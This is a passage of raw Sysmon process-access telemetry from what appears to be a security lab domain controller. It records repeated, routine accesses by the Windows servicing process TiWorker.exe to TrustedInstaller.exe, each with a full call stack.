ystem32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.273{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.258{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.258{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.258{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.258{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.258{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.242{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.242{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.226{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.226{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.226{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.226{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.226{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.211{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.211{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.211{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.211{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 